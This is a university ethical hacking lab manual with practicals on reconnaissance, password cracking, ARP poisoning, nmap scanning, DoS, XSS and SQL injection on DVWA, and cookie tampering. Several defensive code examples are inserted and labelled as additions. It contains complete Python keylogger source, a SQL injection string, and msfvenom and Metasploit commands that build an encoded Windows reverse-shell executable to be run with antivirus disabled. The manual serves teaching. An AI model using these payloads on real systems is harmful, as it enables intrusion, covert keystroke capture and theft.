Ethical hacking practical

The document is a lab manual for the Ethical Hacking course at M.S. College of Science, Arts, and Commerce under Mumbai University for the academic year 2024-2025. It includes a certification section, an index of practicals covering various ethical hacking techniques, and detailed instructions for each practical exercise. Topics range from reconnaissance using Google and Whois to SQL injection, session impersonation, and creating a keylogger with Python.

Habib Education and Welfare Society’s

M.S. COLLEGE OF SCIENCE, ARTS, COMMERCE, BSC (IT), BSC (CS), B.COM, BMS. (DEVGHAR)

MUMBAI UNIVERSITY

ETHICAL HACKING

LAB MANUAL

(A.Y. 2024 – 2025)



CERTIFICATE
DEPARTMENT OF COMPUTER SCIENCE

This is to certify that Mr. / Miss. of B.Sc. (CS) Semester VI, Roll No. has successfully completed the practicals in the subject of Ethical Hacking as per the requirement of University of Mumbai in part fulfillment for the completion of Degree of Bachelor of Science (Computer Science). It is also to certify that this is the original work of the candidate done during the academic year 2024-2025.

Internal Examiner Subject Teacher

H.O.D
DEPARTMENT OF C.S.

DATE OF SUBMISSION: COLLEGE SEAL


INDEX
SR NO.   PRACTICAL NAME   DATE   SIGN

1. Google and Whois Reconnaissance
   • Use Google search techniques to gather information about a specific target or organization.
   • Utilize advanced search operators to refine search results and access hidden information.
   • Perform Whois lookups to retrieve domain registration information and gather details about the target's infrastructure.

2. Password Encryption and Cracking with CrypTool and Cain and Abel
   • Password Encryption and Decryption:
     o Use CrypTool to encrypt passwords using the RC4 algorithm.
     o Decrypt the encrypted passwords and verify the original values.
   • Password Cracking and Wireless Network Password Decoding:
     o Use Cain and Abel to perform a dictionary attack on Windows account passwords.
     o Decode wireless network passwords using Cain and Abel's capabilities.

3. Linux Network Analysis and ARP Poisoning
   • Linux Network Analysis:
     o Execute the ifconfig command to retrieve network interface information.
     o Use the ping command to test network connectivity and analyze the output.
     o Analyze the netstat command output to view active network connections.
     o Perform a traceroute to trace the route packets take to reach a target host.
   • ARP Poisoning:
     o Use ARP poisoning techniques to redirect network traffic on a Windows system.
     o Analyze the effects of ARP poisoning on network communication and security.

4. Port Scanning with NMap
   • Use NMap to perform an ACK scan to determine if a port is filtered, unfiltered, or open.
   • Perform SYN, FIN, NULL, and XMAS scans to identify open ports and their characteristics.
   • Analyze the scan results to gather information about the target system's network services.

5. Network Traffic Capture and DoS Attack with Wireshark and Nemesy
   • Network Traffic Capture:
     o Use Wireshark to capture network traffic on a specific network interface.
     o Analyze the captured packets to extract relevant information and identify potential security issues.
   • Denial of Service (DoS) Attack:
     o Use Nemesy to launch a DoS attack against a target system or network.
     o Observe the impact of the attack on the target's availability and performance.

6. Persistent Cross-Site Scripting Attack
   • Set up a vulnerable web application that is susceptible to persistent XSS attacks.
   • Craft a malicious script to exploit the XSS vulnerability and execute arbitrary code.
   • Observe the consequences of the attack and understand the potential risks associated with XSS vulnerabilities.

7. Session Impersonation with Firefox and Tamper Data
   • Install and configure the Tamper Data add-on in Firefox.
   • Intercept and modify HTTP requests to impersonate a user's session.
   • Understand the impact of session impersonation and the importance of session management.

8. SQL Injection Attack
   • Identify a web application vulnerable to SQL injection.
   • Craft and execute SQL injection queries to exploit the vulnerability.
   • Extract sensitive information or manipulate the database through the SQL injection attack.

9. Creating a Keylogger with Python
   • Write a Python script that captures and logs keystrokes from a target system.
   • Execute the keylogger script and observe the logged keystrokes.
   • Understand the potential security risks associated with keyloggers and the importance of protecting against them.


PRACTICAL NO 01
Aim: Use Google and Whois for Reconnaissance


Practical-2
Aim:
a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
b) Use Cain and Abel for cracking Windows account password using Dictionary attack
and to decode wireless network passwords.

Steps:
1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.

2. Plain Text

3. To Encrypt Click on Encrypt/Decrypt > Symmetric(modern) > RC4

4. Click the number of bits

5. Click Encrypt.

6. To Decrypt Again click on Encrypt/Decrypt > Symmetric(modern) > RC4

7. Click the number of bits.

8. Click Decrypt.


b) Use Cain and Abel for cracking Windows account password using dictionary attack
and to decode wireless network password.

1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.

2. A dialogue box appears after clicking on hash calculator,


Add the text >> Calculate hash code >> Copy MD5 hash value


3. Click on MD5 Hashes>> Add list>>Paste Hash Value.

4. Right-click on the hash code >> Dictionary Attack >> Add to list >> Start


Match Found: Match not Found:


Practical-3
Aim: a) Run and analyze the output of following commands in Linux –
ifconfig, ping, netstat, traceroute.
b) Perform ARP Poisoning in Windows

a) Linux Commands:

1. ifconfig

2. netstat


3. ping

4. traceroute


b) ARP Poisoning
Steps:
1) Click on Sniffer tab.

2) Click on Start/Stop Sniffer and give range values and click okay.


3) Right click on any IP and select Resolve Host Name.

4) Click on ARP tab on the bottom.

5) Click on Add Button(1) and select your router and any IP.


6) Click on the IP and then click on the button shown in the image to start ARP
Poisoning.


Practical – 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.

NOTE: Download Nmap for Windows and install it. After that, open cmd and type “nmap” to
check that it is installed properly. Then type the commands below.

• ACK Scan (-sA)

It never determines open (or even open|filtered) ports. It is used to map out firewall
rulesets, determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

• SYN (Stealth) Scan (-sS)


SYN scan is the default and most popular scan option for good reason. It can be
performed quickly, scanning thousands of ports per second on a fast network not
hampered by intrusive firewalls.

Command: nmap -p22,113,139 scanme.nmap.org


• FIN Scan (-sF)


Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

• NULL Scan (-sN)


Does not set any bits (TCP flag header is 0)

Command: nmap -sN -p 22 scanme.nmap.org

• XMAS Scan (-sX)


Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org
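
The flag patterns listed above are also what a defender matches on. The following is an added example, not part of the lab manual: it parses raw TCP headers and reports sources that send the same probe pattern to several ports. The function names, the threshold of three ports and the sample traffic are assumptions made for the illustration.

```python
import struct
from collections import defaultdict

# TCP flag bits as they appear in the low 6 bits of the flags field.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag patterns sent by the scan types in this practical.
PROBE_NAMES = {0: "NULL", FIN: "FIN", FIN | PSH | URG: "XMAS", SYN: "SYN", ACK: "ACK"}

def parse_tcp(header: bytes):
    """Return (src_port, dst_port, flags) from a raw TCP header."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", header[:14])
    return sport, dport, off_flags & 0x3F  # drop data offset and ECE/CWR bits

def detect_scans(packets, min_ports=3):
    """packets: iterable of (src_ip, raw_tcp_header).
    Returns {src_ip: probe_name} for sources that sent one probe pattern to at
    least min_ports distinct ports. A single SYN or bare ACK is normal traffic,
    so only the spread across ports is reported."""
    ports = defaultdict(set)
    for src, header in packets:
        try:
            _sport, dport, flags = parse_tcp(header)
        except ValueError:
            continue  # skip truncated captures instead of failing
        name = PROBE_NAMES.get(flags)
        if name:
            ports[(src, name)].add(dport)
    return {src: name for (src, name), seen in ports.items() if len(seen) >= min_ports}

def build_header(dport, flags, sport=40000):
    """Build a constructed 20-byte TCP header for the sample data."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 1024, 0, 0)

# Constructed sample traffic using documentation addresses, not a real capture.
SAMPLE = (
    [("198.51.100.7", build_header(p, FIN | PSH | URG)) for p in (22, 80, 443)]
    + [("198.51.100.9", build_header(p, 0)) for p in (21, 22, 23, 25)]
    + [("192.0.2.10", build_header(443, SYN)), ("192.0.2.10", build_header(443, ACK))]
    + [("192.0.2.11", b"\x00\x01")]  # truncated header, ignored
)

if __name__ == "__main__":
    print(detect_scans(SAMPLE))
```
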


Practical-5
Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
b) Use Nemesy to launch DoS attack

a) Use Wireshark (Sniffer) to capture network traffic and analyze


Steps:

1. Open Wireshark and select your Connection.


2. Open any http website and add display filter as http.

3. Right Click on the POST method >> Follow >> TCP stream.


4. Search for ‘credentials’ in the dialog box.


Practical – 6
Aim: Simulate persistent cross-site scripting attack.

Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the folder to DVWA.
4. Open the config folder and rename the file to config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.


8. Click on DVWA security and set the security to low.

9. Click on XSS (Stored), write the script, and click on Sign Guestbook. The script will be
executed whenever the page is reloaded.


Practical – 7
Aim: Session impersonation using Firefox and Tamper Data add-on.
Steps:
1. Open Firefox
2. Go to tools > Add on > Extension
3. Search for and install Tamper Data.
4. Go to the Facebook login page.
5. Now click on the Tamper Data add-on and start tampering the data.
6. Now enter the username and password in the Facebook login page.
7. Your username and password have been captured using session impersonation.


8. Select a website for tampering data, e.g. (razorba).

9. Select any item to buy


10. Then click on add-cart
11. Then click on Tamper Data (add-on)


12. Refresh the page to get the extension.

13. Click on OK.


14. Change values in the Cookie option to tamper the data.

15. Then click on OK and see that the data has been tampered.
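
Steps 14 and 15 succeed because the server accepts whatever cookie value the browser sends back. The following is an added example, not part of the lab manual or of any site named in it: a server-side check that signs the cookie with an HMAC so that an edited value is rejected. The key, the cookie layout and the function names are assumptions for the illustration.

```python
import base64
import hashlib
import hmac

# Assumption: a secret known only to the server (constructed demo value).
SECRET_KEY = b"constructed-demo-key"

def make_tag(value: str, key: bytes) -> str:
    """HMAC-SHA256 over the cookie value, URL-safe base64 encoded."""
    mac = hmac.new(key, value.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode("ascii")

def sign_cookie(value: str, key: bytes = SECRET_KEY) -> str:
    """Return 'value.tag', the string the server sets as the cookie."""
    return value + "." + make_tag(value, key)

def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the original value if the tag matches, otherwise None."""
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # no tag at all: unsigned or truncated cookie
    expected = make_tag(value, key)
    # Constant-time comparison avoids leaking how many characters matched.
    if hmac.compare_digest(tag.encode("utf-8"), expected.encode("ascii")):
        return value
    return None

if __name__ == "__main__":
    issued = sign_cookie("item=42&price=499")           # constructed sample value
    edited = issued.replace("price=499", "price=1")     # value changed in transit
    print(verify_cookie(issued))   # original value is accepted
    print(verify_cookie(edited))   # edited value is rejected
```

Signing protects the integrity of the value, not its secrecy; values such as prices are safer kept on the server and referenced by an opaque session identifier.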


Practical – 8
Aim: Perform SQL injection attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the folder to DVWA.
4. Open the config folder and rename the file to config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.


8. Click on DVWA security and set the security to low.

9. Click on SQL Injection.


10. In User Id enter 1 and click on submit.


11. Type 1' or true;# and click on submit.
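
Why the input in step 11 returns every record at the low security level, and how a parameterized query prevents it. This is an added example, not part of the lab manual and not DVWA's code; it assumes an in-memory SQLite database with a constructed users table, and uses SQLite's `--` comment where the MySQL input above uses `#`.

```python
import sqlite3

# The step 11 input rewritten for SQLite syntax (assumption for this example).
PAYLOAD = "1' OR 1=1 --"

def make_db():
    """Build a constructed in-memory table standing in for the lab database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
               "first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Gordon", "Brown"),
                    (3, "Pablo", "Picasso")])
    return db

def lookup_vulnerable(db, user_id: str):
    """Before: the input is pasted into the SQL text, so a quote in the input
    closes the string literal and the rest is parsed as SQL."""
    query = ("SELECT first_name, last_name FROM users "
             "WHERE user_id = '" + user_id + "'")
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_id: str):
    """After: the input is bound as a value and is never parsed as SQL."""
    return db.execute("SELECT first_name, last_name FROM users "
                      "WHERE user_id = ?", (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))          # one row, as in step 10
    print(lookup_vulnerable(db, PAYLOAD))      # every row in the table
    print(lookup_parameterized(db, PAYLOAD))   # no rows: input treated as data
```
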


Practical – 9
Aim: Create a simple keylogger using python
Code:
from pynput.keyboard import Key, Listener
import logging

# Directory for the log file; an empty string means the current working directory
log_dir = ""

# Configure logging: every entry is timestamped and written to key_log.txt
logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG,
                    format='%(asctime)s:%(message)s:')

# Callback that pynput calls for each key press
def on_press(key):
    logging.info(str(key))

# Start the listener and block until it stops
with Listener(on_press=on_press) as listener:
    listener.join()

Output:


Practical – 10
Aim: Using Metasploit to exploit (Kali Linux).

Steps:
Boot Kali Linux from a pen drive on the PC.
Open Metasploit and type the exit command to quit.
The directory will change to root@kali.
Type the following commands.

1. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.9.191 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
2. msfconsole
3. use exploit/multi/handler
4. msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
5. payload => windows/shell/reverse_tcp
6. show options
7. msf exploit(multi/handler) > set LHOST 192.168.9.191
8. LHOST => 192.168.9.191
9. msf exploit(multi/handler) > set LPORT 31337
10. LPORT => 31337
11. msf exploit(multi/handler) > exploit

PUT THE PAYLOAD GENERATED IN A WINDOWS PC (MAKE SURE ANTIVIRUS IS OFF) AND RUN THE EXE FILE.
